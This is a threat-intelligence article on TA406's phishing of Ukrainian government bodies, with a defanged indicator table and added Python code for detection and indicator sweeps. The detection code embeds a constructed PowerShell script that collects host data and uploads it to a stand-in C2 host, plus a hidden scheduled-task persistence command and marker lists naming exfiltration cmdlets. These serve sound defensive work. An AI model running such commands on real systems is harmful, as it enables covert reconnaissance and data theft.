TA406 Hackers Target Government Entities to Steal Login Credentials
The North Korean state-sponsored threat actor TA406, also tracked as Opal Sleet and Konni, has set its sights on Ukrainian government entities.
Proofpoint researchers have uncovered a dual-pronged offensive involving both credential harvesting and malware deployment through highly targeted phishing campaigns.
The likely objective of these attacks is to gather strategic intelligence on the Russian invasion of Ukraine, reflecting TA406’s historical focus on political and geopolitical insights.

This surge in activity coincides with North Korea’s commitment of troops to assist Russia in late 2024, suggesting an intent to assess the risks to their forces and gauge Russia’s potential demands for additional military support.
DPRK-Linked Group Intensifies
The phishing emails, often sent from spoofed freemail accounts mimicking think tank representatives, leverage current Ukrainian political events as lures.
A notable campaign impersonated a fictitious senior fellow from the nonexistent Royal Institute of Strategic Studies, directing targets to download a password-protected RAR archive from the file-hosting service MEGA.
Once extracted with the supplied password, the archive yields a CHM file with embedded HTML; opening it launches PowerShell reconnaissance scripts that collect host details such as IP configuration and installed antivirus products.
The collected data is Base64-encoded and exfiltrated to a command-and-control (C2) server.
Follow-up emails are sent if targets fail to engage, increasing the pressure to interact with the malicious content.
In parallel, TA406 has distributed HTML attachments and ZIP archives containing LNK shortcuts; the shortcuts run encoded PowerShell that establishes persistence through scheduled tasks and autorun scripts, giving the group long-term access to compromised systems.
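The chain described above (CHM or LNK launching encoded PowerShell that performs reconnaissance, Base64-encodes the result for exfiltration, and installs a scheduled task) leaves a recognisable trace in process-creation telemetry. The Python triage routine below is an added example, not code from the article or the Proofpoint report: it decodes the `-EncodedCommand` payload from a command line and tags the behaviours it reveals. The event field names, the marker lists, the hh.exe parent check and the sample scripts (including the `c2.invalid` host) are this example's own constructions, not observed TA406 artefacts.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


# Minimal process-creation event: the fields a Sysmon Event ID 1 or EDR
# record carries.  The field names are this example's own assumption.
@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match them all.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)

# Substrings in a decoded script that map to the behaviours the article describes
# (illustrative marker lists, not a complete detection ruleset).
BEHAVIOUR_MARKERS: Dict[str, List[str]] = {
    "recon": ["ipconfig", "Get-NetIPConfiguration", "AntiVirusProduct", "SecurityCenter2", "systeminfo"],
    "exfil": ["ToBase64String", "UploadString", "Invoke-WebRequest", "Invoke-RestMethod", "Net.WebClient"],
    "persistence": ["schtasks", "Register-ScheduledTask", r"CurrentVersion\Run", "Startup"],
}
# hh.exe is the Windows HTML Help viewer; a shell spawned under it means a CHM ran code.
SUSPICIOUS_PARENTS = {"hh.exe": "chm-parent"}


def encode_for_powershell(script: str) -> str:
    """-EncodedCommand expects Base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: ProcEvent) -> dict:
    """Decode the command line and tag parent-process and script behaviours."""
    tags = set()
    parent = event.parent_image.lower().rsplit("\\", 1)[-1]
    if parent in SUSPICIOUS_PARENTS:
        tags.add(SUSPICIOUS_PARENTS[parent])
    decoded = decode_encoded_command(event.command_line)
    if decoded is not None:
        lowered = decoded.lower()
        for tag, markers in BEHAVIOUR_MARKERS.items():
            if any(marker.lower() in lowered for marker in markers):
                tags.add(tag)
    return {"encoded": decoded is not None, "decoded": decoded, "tags": sorted(tags)}


# Constructed sample scripts modelled on the behaviour described, not real payloads.
RECON_SCRIPT = (
    "$d = (ipconfig /all | Out-String) + "
    "(Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Out-String); "
    "$b = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($d)); "
    "(New-Object Net.WebClient).UploadString('http://c2.invalid/receive.php', $b)"
)
PERSIST_SCRIPT = (
    'schtasks /create /f /sc minute /mo 15 /tn "OneDriveUpdate" '
    '/tr "powershell -w hidden -File $env:APPDATA\\sync.ps1"'
)
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events: CHM-spawned recon, LNK-spawned persistence, and a benign baseline.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\hh.exe", POWERSHELL,
              "powershell.exe -ep bypass -w hidden -e " + encode_for_powershell(RECON_SCRIPT)),
    ProcEvent(r"C:\Windows\System32\cmd.exe", POWERSHELL,
              "powershell.exe -NoP -NonI -enc " + encode_for_powershell(PERSIST_SCRIPT)),
    ProcEvent(r"C:\Windows\explorer.exe", POWERSHELL,
              "powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.parent_image, "->", triage(ev)["tags"])
```

The decode step matters more than the marker lists: an encoded command line shows none of these strings to a plain keyword search, so any rule keyed on `ipconfig` or `schtasks` must run over the decoded script. The parent-process check is the cheap, high-signal part; PowerShell under hh.exe has almost no benign explanation.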

Credential Harvesting
Before the malware campaigns, TA406 attempted credential theft by sending fake Microsoft security alerts from Proton Mail accounts to the same Ukrainian targets.
According to the report, these messages, citing suspicious sign-in activity, directed victims to a compromised domain, jetmf[.]com, previously linked to Naver credential harvesting.
While a specific harvesting page could not be recovered during analysis, the overlap in tactics and targeting strongly suggests TA406’s involvement.
This credential harvesting likely serves as a precursor to deeper intrusions, enabling the group to access sensitive communications and further their espionage efforts.
Unlike Russian threat actors focusing on tactical battlefield data, TA406’s operations appear geared toward understanding Ukraine’s political will to resist the invasion and the broader outlook of the conflict, providing North Korean leadership with critical insights into their strategic positioning.
Indicators of Compromise (IoC)
Indicators are defanged as published; the two spoofed sender display names are reproduced with the actor's misspellings.

Indicator | Type | Context | First Seen
---|---|---|---
Microft Acount Tearns | Sender display name | Credential harvest delivery | February 2025
Microsooft | Sender display name | Credential harvest delivery | February 2025
jetmf[.]com | Domain | Credential harvest delivery | February 2025
john.smith.19880@outlook[.]com | Email address | Malware delivery | February 2025
john.dargavel.smith46@gmail[.]com | Email address | Malware delivery | February 2025
hxxps://mega[.]nz/file/SmxUiA4K#QoS_PYQDnJN4VtsSg5HoCv5eOK0AI1bL6Cw5lxA0zfI | URL | Malware delivery | February 2025
hxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/test.txt | URL | C2 | February 2025
hxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/receive.php | URL | C2 | February 2025
hxxps://lorica[.]com.ua/MFA/вкладення.zip | URL | Malware delivery | February 2025
hxxp://qweasdzxc.mygamesonline[.]org/dn.php | URL | C2 | February 2025
hxxp://wersdfxcv.mygamesonline[.]org/view.php | URL | C2 | February 2025
58adb6b87a3873f20d56a10ccde457469adb5203f3108786c3631e0da555b917 | SHA256 | Malware delivery | February 2025
28116e434e35f76400dc473ada97aeae9b93ca5bcc2a86bd1002f6824f3c9537 | SHA256 | Malware delivery | February 2025
2a13f273d85dc2322e05e2edfaec7d367116366d1a375b8e9863189a05a5cec5 | SHA256 | Malware delivery | February 2025
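Turning the table above into a sweep is mostly a matter of handling the ways the published form differs from what logs record: the indicators are defanged, proxies log percent-encoded paths rather than the Cyrillic filename, and nobody logs a URL fragment, so the MEGA link must match on host and path alone. The Python sweep below is an added example, not code from the article or the Proofpoint report. It refangs the table, builds per-type watchlists, and matches them against constructed log lines; the log formats and every address, host and hash other than the published indicators are this example's own inventions. It also goes one step beyond the table by treating any request to a host that appears only as C2 as a hit, regardless of path, while leaving shared file-hosting and compromised legitimate sites as exact-URL matches.

```python
import re
from typing import List, Set, Tuple
from urllib.parse import unquote, urlsplit

# Indicators from the article's table, kept defanged exactly as published.
IOCS: List[Tuple[str, str, str]] = [
    ("jetmf[.]com", "domain", "Credential harvest delivery"),
    ("john.smith.19880@outlook[.]com", "email", "Malware delivery"),
    ("john.dargavel.smith46@gmail[.]com", "email", "Malware delivery"),
    ("hxxps://mega[.]nz/file/SmxUiA4K#QoS_PYQDnJN4VtsSg5HoCv5eOK0AI1bL6Cw5lxA0zfI", "url", "Malware delivery"),
    ("hxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/test.txt", "url", "C2"),
    ("hxxp://pokijhgcfsdfghnj.mywebcommunity[.]org/main/receive.php", "url", "C2"),
    ("hxxps://lorica[.]com.ua/MFA/вкладення.zip", "url", "Malware delivery"),
    ("hxxp://qweasdzxc.mygamesonline[.]org/dn.php", "url", "C2"),
    ("hxxp://wersdfxcv.mygamesonline[.]org/view.php", "url", "C2"),
    ("58adb6b87a3873f20d56a10ccde457469adb5203f3108786c3631e0da555b917", "sha256", "Malware delivery"),
    ("28116e434e35f76400dc473ada97aeae9b93ca5bcc2a86bd1002f6824f3c9537", "sha256", "Malware delivery"),
    ("2a13f273d85dc2322e05e2edfaec7d367116366d1a375b8e9863189a05a5cec5", "sha256", "Malware delivery"),
]


def refang(indicator: str) -> str:
    """Undo the usual defanging conventions (hxxp, [.], [:])."""
    return indicator.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def url_key(url: str) -> Tuple[str, str]:
    """(host, path) with percent-encoding removed and the fragment dropped."""
    parts = urlsplit(url)
    return ((parts.hostname or "").lower(), unquote(parts.path))


def build_watchlists(iocs):
    urls: Set[Tuple[str, str]] = set()
    domains: Set[str] = set()
    emails: Set[str] = set()
    hashes: Set[str] = set()
    for raw, kind, context in iocs:
        value = refang(raw)
        if kind == "url":
            urls.add(url_key(value))
            if context == "C2":  # a C2 host is interesting on any path; a file host is not
                domains.add(url_key(value)[0])
        elif kind == "domain":
            domains.add(value.lower())
        elif kind == "email":
            emails.add(value.lower())
        elif kind == "sha256":
            hashes.add(value.lower())
    return urls, domains, emails, hashes


URL_RE = re.compile(r"https?://[^\s\"'<>]+")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
SHA256_RE = re.compile(r"\b[0-9a-fA-F]{64}\b")


def scan(lines: List[str], iocs=IOCS) -> List[Tuple[int, str, str]]:
    """Return (line_number, indicator_type, matched_value) for every hit."""
    urls, domains, emails, hashes = build_watchlists(iocs)
    hits = []
    for n, line in enumerate(lines, 1):
        for url in URL_RE.findall(line):
            key = url_key(url)
            if key in urls:
                hits.append((n, "url", url))
            elif key[0] in domains:  # new path on a known C2 host
                hits.append((n, "domain", key[0]))
        for addr in EMAIL_RE.findall(line):
            if addr.lower() in emails:
                hits.append((n, "email", addr))
        for digest in SHA256_RE.findall(line):
            if digest.lower() in hashes:
                hits.append((n, "sha256", digest.lower()))
    return hits


# Constructed log lines (mail gateway, proxy, EDR) in an invented format.
SAMPLE_LOG = [
    '2025-02-11T07:55:02Z mail from=john.smith.19880@outlook.com to=press@example.gov.ua subject="Analysis request"',
    "2025-02-11T08:10:17Z proxy 10.20.0.8 GET https://mega.nz/file/SmxUiA4K 200",
    "2025-02-11T08:12:40Z proxy 10.20.0.8 POST http://pokijhgcfsdfghnj.mywebcommunity.org/main/receive.php 200",
    "2025-02-11T08:13:05Z proxy 10.20.0.8 GET http://pokijhgcfsdfghnj.mywebcommunity.org/main/stage2.txt 404",
    "2025-02-11T08:30:00Z proxy 10.20.0.8 GET https://lorica.com.ua/MFA/%D0%B2%D0%BA%D0%BB%D0%B0%D0%B4%D0%B5%D0%BD%D0%BD%D1%8F.zip 200",
    r"2025-02-11T08:31:12Z edr sha256=58ADB6B87A3873F20D56A10CCDE457469ADB5203F3108786C3631E0DA555B917 path=C:\Users\u\Downloads\report.chm",
    "2025-02-11T09:00:00Z proxy 10.20.0.9 GET https://mega.nz/file/otherfile 200",
    '2025-02-11T09:05:44Z mail from=colleague@example.gov.ua to=press@example.gov.ua subject="Lunch"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Host-level matching is deliberately limited to the C2 context: mega.nz and the compromised Ukrainian site serve plenty of legitimate traffic, so they match only on the exact path, while the throwaway free-hosting subdomains used for C2 are worth flagging on any request.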